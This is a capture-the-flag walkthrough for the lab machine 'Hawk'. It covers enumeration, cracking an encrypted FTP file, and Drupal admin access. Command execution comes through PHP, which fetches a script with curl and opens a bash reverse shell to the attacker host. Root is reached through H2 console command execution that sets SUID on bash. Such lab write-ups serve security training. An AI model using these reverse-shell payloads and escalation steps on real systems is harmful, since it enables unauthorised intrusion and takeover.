Hawk

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.102 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-22 19:34 CET
Nmap scan report for 10.10.10.102
Host is up (0.066s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
5435/tcp open  sceanics
8082/tcp open  blackice-alerts
9092/tcp open  XmlIpcRegSvc

Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,5000 10.10.10.91 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-22 19:35 CET
Nmap scan report for 10.10.10.102
Host is up (0.038s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Jun 16  2018 messages
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.14
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e40ccbc5a59178ea5496af4d03e4fc88 (RSA)
|   256 95cbf8c7355eafa9448b17594ddb5adf (ECDSA)
|_  256 4a0b2ef71d99bcc7d30b9153b93be279 (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.29 (Ubuntu)
5435/tcp open  tcpwrapped
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
9092/tcp open  XmlIpcRegSvc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https:/ce :
SF-Port9092-TCP:V=7.93%I=7%D=11/22%Time=637D1666%P=x86_64-pc-linux-gnu%r(N
SF:ULL,45E,"\0\0\0\0\0\0\0\x05\x009\x000\x001\x001\x007\0\0\0F\0R\0e\0m\0o
SF:\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\0t\0o\0\x20\0t\0h\0
SF:i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n\0o\0t\0\x20\0a\0l\
SF:0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0A\0l\0l\0o\0w\0O\0t
SF:\0h\0e\0r\0s\xff\xff\xff\xff\0\x01`\x05\0\0\x01\xd8\0o\0r\0g\0\.\0h\x00
SF:2\0\.\0j\0d\0b\0c\0\.\0J\0d\0b\0c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0
SF::\0\x20\0R\0e\0m\0o\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\
SF:0t\0o\0\x20\0t\0h\0i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n
SF:\0o\0t\0\x20\0a\0l\0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0
SF:A\0l\0l\0o\0w\0O\0t\0h\0e\0r\0s\0\x20\0\[\x009\x000\x001\x001\x007\0-\x
SF:001\x009\x006\0\]\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s
SF:\0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0J\0d\0b
SF:\0c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\(\0D\0b\0E\0x\0c\0e\0p\0t\0i\
SF:0o\0n\0\.\0j\0a\0v\0a\0:\x003\x004\x005\0\)\0\n\0\t\0a\0t\0\x20\0o\0r\0
SF:g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0
SF:o\0n\0\.\0g\0e\0t\0\(\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\
SF:0:\x001\x007\x009\0\)\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0
SF:e\0s\0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0\(\
SF:0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x001\x005\x005\0\)\
SF:0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0
SF:D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0\(\0D\0b\0E\0x\0c\0e\0p\0
SF:t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x001\x004\x004\0\)\0\n\0\t\0a\0t\0\x20\0o
SF:\0r");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.85 seconds

As we can see in the nmap report, the anonymous login is available in the FTP server.

ftp 10.10.10.102

Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:alfa8sa): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

There is one directory called messages with a hidden file called .drupal.txt.enc.

ftp> ls

229 Entering Extended Passive Mode (|||43037|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16  2018 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||45357|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16  2018 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16  2018 ..
-rw-r--r--    1 ftp      ftp           240 Jun 16  2018 .drupal.txt.enc
226 Directory send OK.

Let's download that file to our local machine.

get .drupal.txt.enc

local: .drupal.txt.enc remote: .drupal.txt.enc
229 Entering Extended Passive Mode (|||45315|)
150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
100% |*****************************************|   240       70.46 KiB/s    00:00 ETA
226 Transfer complete.
240 bytes received in 00:00 (5.65 KiB/s)

Exploitation

As we can see, that file is encrypted with openssl.

file .drupal.txt.enc

.drupal.txt.enc: openssl enc'd data with salted password, base64 encoded

There is a tool called openssl-bruteforce, which allow us to crack these type of encrypted messages. We just have to give it a wordlist, a ciphers list (in this case we'll use AES-256-CBC), and the encrypted file.

python2 /home/alfa8sa/tools/openssl-bruteforce/brute.py /usr/share/wordlists/rockyou.txt cipher.txt .drupal.txt.enc

Running pid: 134065     Cipher: AES-256-CBC
--------------------------------------------------
Password found with algorithm AES-256-CBC: friends
Data: 
Daniel,

Following the password for the portal:

PencilKeyboardScanner123

Please let us know when the portal is ready.

Kind Regards,

IT department

--------------------------------------------------
--------------------------------------------------
Found 1 ciphers with passwords
Cipher: AES-256-CBC     Password: friends

We were able to crack the message successfully, and as we can see, there is a password in the message. The web server only shows a login page for the Drupal administration panel.

Logging in as admin with the found password will give us access to the administration page.

Now, we can see all the administration options at the top of the page.

Time to get a shell. First, create the rv.sh file with the following content.

nano rv.sh

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.14/4444 0>&1

Then, set a simple HTTP server with Python on the current directory.

python -m http.server 80

Now, set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

To be able to run commands on the server, we'll have to go to Modules, select the PHP filter module, and save the configuration.

Now go to Content, + Add content, Article, put a random title, and write the following code in the body of the article. This will download the rv.sh file from our machine, and send us a reverse shell. Make sure to select the PHP code option in Text format.

<?php system("curl 10.10.14.14/rv.sh | bash"); ?>

To run the command, click on the Preview button. Then, we'll get a shell as www-data, and we could grab the user flag.

Listening on 0.0.0.0 4444
Connection received on 10.10.10.102 53464
bash: cannot set terminal process group (880): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hawk:/var/www/html$ whoami
whoami
www-data
www-data@hawk:/var/www/html$ cat /home/daniel/user.txt
cat /home/daniel/user.txt
56c6b4dbb68d1cacbed17bbbd5f7ce1d

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we search recursively in the /var/www/html for the password word, we'll see one password in the sites/default/settings.php file.

grep -r password 2>/dev/null

...
sites/default/settings.php:      'password' => 'drupal4hawk',
...

That password is valid for the daniel user, but we get a python shell, instead of the common bash shell.

su daniel

Password: drupal4hawk
Python 3.6.5 (default, Apr  1 2018, 05:46:30) 
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

But we can get a normal bash shell with the pty module.

import pty;pty.spawn("/bin/bash")

If you remember, there was another HTTP server running on port 8082. And , as we can see the h2 service is being executed by root.

ps aux

...
root       780  0.0  0.0   4628   820 ?        Ss   20:24   0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
root       781  0.1  5.2 2337468 53304 ?       Sl   20:24   0:05 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
...

But it looks like we can't access it.

But, we could access the website with an SSH tunnel.

sshpass -p 'drupal4hawk' ssh daniel@10.10.10.102 -L 8082:127.0.0.1:8082

Now, we can access the website as if we were the localhost.

There is a great guide on how to run commands on a h2 database. First, change the JDBC URL to something random, and hit Connect.

Now, run the following command, which will give the bash binary the SUID permission.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;
CALL SHELLEXEC('chmod u+s /bin/bash')

Finally, all we have to do is execute bash with SUID permissions, and reap the harvest and take the root flag.

bash -p

bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
c4ca8bfba3ae3db4b02fc64d423682ff

Last updated 2 years ago

Was this helpful?